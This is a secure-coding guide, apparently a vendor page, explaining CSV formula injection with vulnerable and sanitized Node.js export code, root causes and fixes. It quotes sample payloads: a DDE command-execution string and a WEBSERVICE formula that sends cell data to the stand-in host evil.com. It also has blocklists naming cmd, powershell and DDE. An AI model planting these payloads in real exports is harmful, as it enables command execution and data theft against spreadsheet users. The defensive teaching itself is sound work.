CSV injection (formula injection) from unsanitized user input in CSV exports

Risk: Medium | Category: input-validation
Tags: csv-injection, formula-injection, spreadsheet, data-export, code-execution, excel

What it is

CSV injection, also known as formula injection, occurs when untrusted user input is written to CSV files without proper sanitization. When such a file is opened in a spreadsheet application like Microsoft Excel, Google Sheets, or LibreOffice Calc, any cell whose content begins with a formula character is evaluated as a formula. Depending on the application and its security settings, this can lead to command execution on the user's system (for example through Dynamic Data Exchange in Excel), data exfiltration through functions that make network requests, or access to local files.

// VULNERABLE: Direct CSV generation without sanitization
const express = require('express');
const app = express();

app.get('/export/users', async (req, res) => {
    // getUsersFromDatabase() is an application-specific data-access helper (not shown)
    const users = await getUsersFromDatabase();
    
    let csv = 'Name,Email,Comments\n';
    
    users.forEach(user => {
        // VULNERABLE: Direct inclusion of user data
        csv += `${user.name},${user.email},${user.comments}\n`;
    });
    
    res.setHeader('Content-Type', 'text/csv');
    res.setHeader('Content-Disposition', 'attachment; filename="users.csv"');
    res.send(csv);
});

// Malicious user data examples:
// name: "=cmd|' /C calc'!A0"
// comments: "=WEBSERVICE(\"http://evil.com/steal?data=\"&A1)"

// SECURE: CSV generation with sanitization (a separate module from the example above)
const express = require('express');
const app = express();

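function sanitizeCSVField(field) {
    if (field === null || field === undefined) {
        return '';
    }

    let value = String(field);

    // Remove C0/C1 control characters. Note that this also removes tab, CR and LF,
    // so multi-line values are flattened onto a single line.
    value = value.replace(/[\x00-\x1F\x7F-\x9F]/g, '');

    // Check for formula indicators. Tab and CR are already stripped above; they
    // stay in the list in case the control-character rule is relaxed later.
    const formulaPrefixes = ['=', '+', '-', '@', '\t', '\r'];
    if (formulaPrefixes.some(prefix => value.startsWith(prefix))) {
        // Neutralize by prefixing with a single quote so the cell is read as text
        value = "'" + value;
    }

    // Defense in depth: replace content matching known-dangerous patterns.
    // These heuristics can also match harmless text (e.g. "A | B!").
    const dangerousPatterns = [
        /\b(cmd|powershell|dde|webservice)\b/i,
        /\|.*!/  // DDE-style patterns such as cmd|' /C calc'!A0
    ];

    for (const pattern of dangerousPatterns) {
        if (pattern.test(value)) {
            return '[CONTENT_SANITIZED]';
        }
    }

    // Escape embedded double quotes by doubling them (RFC 4180)
    value = value.replace(/"/g, '""');

    // Enclose the field in quotes if it contains a comma, a double quote or a
    // line break; a field with escaped quotes is only valid when enclosed
    if (/[",\r\n]/.test(value)) {
        value = `"${value}"`;
    }

    return value;
}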

app.get('/export/users', async (req, res) => {
    try {
        const users = await getUsersFromDatabase();
        
        let csv = 'Name,Email,Comments\n';
        
        users.forEach(user => {
            // SECURE: Sanitize all user data
            const safeName = sanitizeCSVField(user.name);
            const safeEmail = sanitizeCSVField(user.email);
            const safeComments = sanitizeCSVField(user.comments);
            csv += `${safeName},${safeEmail},${safeComments}\n`;
        });
        
        res.setHeader('Content-Type', 'text/csv');
        res.setHeader('Content-Disposition', 'attachment; filename="users_secure.csv"');
        res.send(csv);
        
    } catch (error) {
        console.error('Export error:', error);
        res.status(500).json({ error: 'Export failed' });
    }
});

💡 Why This Fix Works

The vulnerable code writes user input directly into the CSV, so any field beginning with =, +, -, or @ (or a tab or carriage return) is interpreted as a formula when the file is opened. The secure version passes every field through sanitizeCSVField, which removes control characters, prefixes fields that begin with a formula character with a single quote so the spreadsheet treats them as text, replaces content matching known-dangerous patterns such as DDE command syntax with a placeholder, and doubles embedded quotes and encloses the field in quotes where needed so that user data cannot break out into a neighboring cell.

Why it happens

Root causes

Direct Inclusion of Formula Characters in CSV Exports

Application code directly concatenates user-provided strings into CSV files without checking for or escaping formula indicator characters (=, +, -, @, tab, carriage return). When users enter names like "=1+1" or comments containing "=cmd|' /C calc'!A0", these values get written directly to CSV fields. Upon opening in Excel, Google Sheets, or LibreOffice Calc, the spreadsheet application interprets these as formulas and executes them, potentially running commands via DDE (Dynamic Data Exchange), accessing local files, or making web requests to exfiltrate data.

Missing CSV Field Escaping and Sanitization

CSV generation code lacks proper escaping logic for special characters in user data. Developers either omit a sanitization step that prefixes dangerous leading characters with a single quote (') to force text interpretation, or build CSV strings by hand instead of using an established CSV library that quotes fields correctly. Export functionality often treats user input as trusted data, interpolating database values directly into CSV strings without considering that user profiles, comments, descriptions, or any other free-text field could contain malicious formulas.
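
Escaping matters even when a prefix check is in place: if a field is not quoted, an embedded comma starts a new cell, and a formula character that sat in the middle of the user's input now sits at the start of that new cell. The sketch below contrasts the two cases; prefixOnly and prefixAndQuote are hypothetical helpers written for illustration.

```javascript
// Prefix check only, no CSV quoting (the incomplete approach)
function prefixOnly(value) {
    return /^[=+\-@\t\r]/.test(value) ? "'" + value : value;
}

// Prefix check plus RFC 4180 quoting of fields containing , " CR or LF
function prefixAndQuote(value) {
    const prefixed = prefixOnly(value);
    return /[",\r\n]/.test(prefixed) ? `"${prefixed.replace(/"/g, '""')}"` : prefixed;
}

const payload = 'Bob,=1+1';
console.log(['1', prefixOnly(payload)].join(','));     // 1,Bob,=1+1   ("=1+1" becomes its own cell)
console.log(['1', prefixAndQuote(payload)].join(',')); // 1,"Bob,=1+1" (stays inside one cell)
```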

Dynamic Formula Construction from User Data

Applications build CSV files with calculated fields or summary rows that incorporate user-controlled values into formula strings. For example, creating cells with formulas like "=SUM(A" + userRow + ":A" + lastRow + ")" where userRow comes from user input, or constructing VLOOKUP/INDEX formulas referencing user-supplied sheet names or cell ranges. Attackers can inject formula fragments that break out of the intended formula context and execute arbitrary spreadsheet functions.
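
When a formula has to be generated, one way to keep user input out of formula syntax is to accept only validated integers and build the formula from the parsed numbers, never from the raw strings. The sketch below assumes a SUM over column A; buildSumFormula is a hypothetical helper, and the upper bound of 1,048,576 is Excel's per-worksheet row limit, used here as an assumed maximum.

```javascript
// Maximum row number accepted (Excel's worksheet row limit, assumed here)
const MAX_ROW = 1048576;

// Builds =SUM(A<start>:A<end>) only from validated integers, so user input
// can never contribute formula syntax such as ")+HYPERLINK(...)".
function buildSumFormula(startRow, endRow) {
    const rows = [startRow, endRow].map(row => {
        const n = Number(row);
        if (!Number.isInteger(n) || n < 1 || n > MAX_ROW) {
            throw new RangeError(`Invalid row number: ${row}`);
        }
        return n;
    });
    return `=SUM(A${rows[0]}:A${rows[1]})`;
}

console.log(buildSumFormula(2, 10)); // =SUM(A2:A10)
```

Rejecting input outright is a deliberate choice here: silently coercing a malformed row reference would hide tampering that is worth logging.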

Insufficient Input Validation in Data Export Features

Data export endpoints (user lists, order reports, analytics exports, transaction histories) lack input validation specifically designed to detect and neutralize CSV injection attempts. While applications may validate data at input time for SQL injection or XSS, they don't apply formula-specific validation before export. Export features are often implemented as ancillary functionality and receive less security scrutiny than primary user-facing features, leading to overlooked CSV injection vulnerabilities.

Overlooking Formula Injection in User-Generated Content

Security teams fail to recognize that any user-controlled data appearing in CSV exports represents an injection risk. Common overlooked fields include user profile names, email addresses, comment sections, form responses, product reviews, support ticket descriptions, custom field values, and metadata fields. Developers assume these fields contain benign text and don't anticipate users crafting formula payloads, especially in contexts where the data won't be viewed by the attacker themselves (e.g., admin exports of user data).

Fixes

1

Escape or Remove Formula Indicator Characters

Implement a sanitization function that detects and neutralizes formula indicator characters (=, +, -, @, tab \t, carriage return \r) at the beginning of CSV field values. Check whether value.startsWith() matches any of these characters and either remove them or prepend a character that breaks formula interpretation (the single quote described in the next fix is the most widely used choice). If you remove them, strip every leading indicator character, not just the first, because a value such as "==1+1" still begins with "=" after one character is removed; be aware that removal also alters legitimate values such as negative numbers. Apply this sanitization to every user-controlled field before including it in CSV output so that spreadsheet applications treat the content as text rather than as a formula.
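
A minimal sketch of the removal strategy, assuming a hypothetical helper named stripFormulaPrefix. It removes the whole run of leading indicator characters in one pass; it also strips leading whitespace, on the conservative assumption that a spreadsheet might skip whitespace before deciding whether a cell is a formula.

```javascript
// Removes every leading formula-indicator character (= + - @) and any leading
// whitespace (including tab and CR), not just the first character.
function stripFormulaPrefix(value) {
    return String(value).replace(/^[\s=+\-@]+/, '');
}

console.log(stripFormulaPrefix('==1+1'));       // 1+1
console.log(stripFormulaPrefix('\t=cmd|x!A0')); // cmd|x!A0
console.log(stripFormulaPrefix('-5'));          // 5  (legitimate data is altered)
console.log(stripFormulaPrefix('Alice'));       // Alice
```

The "-5" case shows the cost of this strategy: the stored value changes, which is one reason prefixing is often preferred over removal.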

2

Prefix Dangerous Content with Single Quote

When a CSV field starts with a formula character, prefix it with a single quote ('). Spreadsheet applications such as Excel and Google Sheets then treat the content as literal text rather than as a formula; for example, "=1+1" becomes "'=1+1". Implement this as: if (formulaPrefixes.some(prefix => value.startsWith(prefix))) { value = "'" + value; }. This is the most commonly recommended approach to CSV injection prevention, including in OWASP's guidance, and it keeps the original value readable. Two caveats apply: depending on the application, the apostrophe may be visible in the cell, and legitimate values that begin with - or + (negative numbers, international phone numbers) are turned into text.
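
The single-quote prefix can be combined with always quoting each field, so that embedded commas, quotes, and line breaks can never move part of a value into a new cell. This is a minimal sketch; toSafeCell and toCsvRow are hypothetical names, and the prefix list is the one used throughout this article.

```javascript
const FORMULA_PREFIXES = ['=', '+', '-', '@', '\t', '\r'];

// Neutralizes one cell: prefix formula-like values with a single quote,
// double any embedded double quotes, and always wrap the result in quotes.
function toSafeCell(field) {
    let value = field === null || field === undefined ? '' : String(field);
    if (FORMULA_PREFIXES.some(prefix => value.startsWith(prefix))) {
        value = "'" + value;
    }
    return `"${value.replace(/"/g, '""')}"`;
}

// Joins already-neutralized cells into one CSV row
function toCsvRow(fields) {
    return fields.map(toSafeCell).join(',');
}

console.log(toCsvRow(['=1+1', 'Alice', 'say "hi"']));
// "'=1+1","Alice","say ""hi"""
```

Quoting on its own would not stop evaluation; it is the leading single quote that neutralizes the formula, while the quoting keeps cell boundaries intact.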

3

Use Security-Aware CSV Libraries

Adopt well-maintained CSV generation libraries instead of building CSV by manual string concatenation. For JavaScript/Node.js this includes csv-stringify, fast-csv, or PapaParse; for Python, the csv module or pandas; for Java, Apache Commons CSV or OpenCSV. These libraries reliably handle delimiter, quote, and line-break escaping, which stops user data from spilling into adjacent cells, but most do not neutralize formulas by default. Quoting alone is not a defense: a field written as "=1+1" in QUOTE_ALL mode is still evaluated as a formula when the file is opened. Check whether your library offers a formula-escaping option (PapaParse's unparse, for example, has an escapeFormulae setting) and verify which prefixes it covers; otherwise, apply a prefix sanitizer to each value before passing it to the library.
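
Because most CSV writers only handle quoting, a library-agnostic option is a pre-pass that neutralizes formula prefixes on each record before the records reach the writer. The sketch below is a hypothetical helper, neutralizeRecords, not part of any library; it leaves non-string values alone so that numeric columns stay numeric.

```javascript
// Formula-indicator characters, anchored at the start of the value
const FORMULA_PREFIX = /^[=+\-@\t\r]/;

// Returns copies of the records in which every string value that starts with
// a formula-indicator character is prefixed with a single quote. Numbers,
// booleans and null pass through unchanged, so a numeric -5 stays numeric.
function neutralizeRecords(records) {
    return records.map(record =>
        Object.fromEntries(
            Object.entries(record).map(([key, value]) => [
                key,
                typeof value === 'string' && FORMULA_PREFIX.test(value) ? "'" + value : value,
            ])
        )
    );
}

const users = [{ name: '=HYPERLINK("http://example.com","x")', balance: -5 }];
const safeUsers = neutralizeRecords(users);
console.log(safeUsers);
// safeUsers can then be handed to the CSV writer of your choice.
```

Treating only strings as untrusted assumes numeric columns come from typed database fields; if numbers arrive as user-supplied strings, they are prefixed like any other text.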

4

Remove Control Characters from CSV Fields

Strip control characters (the ASCII range 0x00-0x1F and 0x7F, plus the C1 control range 0x80-0x9F) from user input before CSV export, for example with value.replace(/[\x00-\x1F\x7F-\x9F]/g, ''). Control characters can be used in more advanced injection payloads and are not parsed consistently across spreadsheet applications. Note that this range includes tab, carriage return, and line feed, so multi-line text is flattened onto one line. Additionally, detect and block dangerous patterns such as DDE command syntax (e.g., /\|.*!/), WEBSERVICE function calls, or references to external URLs. Replace detected content with placeholder text such as "[CONTENT_SANITIZED]" so that it cannot execute and reviewers can still see that something was removed. Treat these patterns as defense in depth: they are easy to evade and can also match harmless text.
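
If some fields legitimately contain line breaks (comments, addresses), a variant that keeps LF and CR and relies on CSV quoting for them may fit better. The sketch below offers both behaviors; stripControlChars and its keepLineBreaks option are hypothetical names chosen for illustration.

```javascript
// C0 controls, DEL and C1 controls (0x00-0x1F, 0x7F, 0x80-0x9F)
const ALL_CONTROLS = /[\x00-\x1F\x7F-\x9F]/g;
// The same set minus LF (0x0A) and CR (0x0D); tab is still removed
const CONTROLS_EXCEPT_LINE_BREAKS = /[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]/g;

function stripControlChars(value, { keepLineBreaks = false } = {}) {
    const pattern = keepLineBreaks ? CONTROLS_EXCEPT_LINE_BREAKS : ALL_CONTROLS;
    return String(value).replace(pattern, '');
}

console.log(JSON.stringify(stripControlChars('a\x00b\u0085c')));                         // "abc"
console.log(JSON.stringify(stripControlChars('line1\r\nline2')));                        // "line1line2"
console.log(JSON.stringify(stripControlChars('line1\r\nline2', { keepLineBreaks: true }))); // "line1\r\nline2"
```

Run this step before the formula-prefix check: removing a leading control character can expose a formula character underneath it, as in "\x00=1+1".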

5

Implement Pre-Export Content Validation

Add validation logic before CSV generation that scans all export data for potential formula injection payloads. Define an allowlist of acceptable patterns for each field type (e.g., email addresses must match an email regex, phone numbers may contain only digits and common separators). Maintain a blocklist of known dangerous patterns, including cmd, powershell, DDE calls, WEBSERVICE, HYPERLINK, and external file references. Log all blocked content for security monitoring. Consider warning users when the data being exported contains potentially malicious formulas, and let them choose between sanitizing automatically and aborting the export. Validation complements, but does not replace, neutralizing formula prefixes at output time, because a value can pass an allowlist (an international phone number such as +44...) and still begin with a formula character.
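
A minimal sketch of such a pre-export scan, assuming a flat row object. FIELD_RULES, BLOCKLIST, and findSuspiciousFields are hypothetical; the regexes are illustrative rather than complete, and the findings are simply logged with console.warn where a real system would use its own logger.

```javascript
// Hypothetical per-field allowlist rules; adjust to your own schema
const FIELD_RULES = {
    email: /^[^\s@]+@[^\s@]+\.[^\s@]+$/,
    phone: /^\+?[0-9 ()-]{6,20}$/,
};

// Illustrative blocklist of known-dangerous content
const BLOCKLIST = [
    /\b(cmd|powershell)\b/i,
    /\b(WEBSERVICE|HYPERLINK|DDE)\s*\(/i,
    /\|.*!/, // DDE-style syntax
];

// Returns one finding per field that fails its allowlist or matches the blocklist
function findSuspiciousFields(row) {
    const findings = [];
    for (const [field, value] of Object.entries(row)) {
        const text = value == null ? '' : String(value);
        const rule = FIELD_RULES[field];
        if (rule && !rule.test(text)) {
            findings.push({ field, reason: 'failed allowlist' });
        } else if (BLOCKLIST.some(pattern => pattern.test(text))) {
            findings.push({ field, reason: 'matched blocklist' });
        }
    }
    return findings;
}

const row = {
    email: 'alice@example.com',
    phone: '+44 20 7946 0000',
    comments: '=HYPERLINK("http://evil.example","click")',
};
for (const finding of findSuspiciousFields(row)) {
    console.warn('Blocked export content', finding);
}
```

Note that the phone value passes its allowlist yet still starts with "+", so it must still be neutralized when the CSV is written.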

Detect This Vulnerability in Your Code

Sourcery automatically identifies CSV injection (formula injection) from unsanitized user input in CSV exports and many other security issues in your codebase.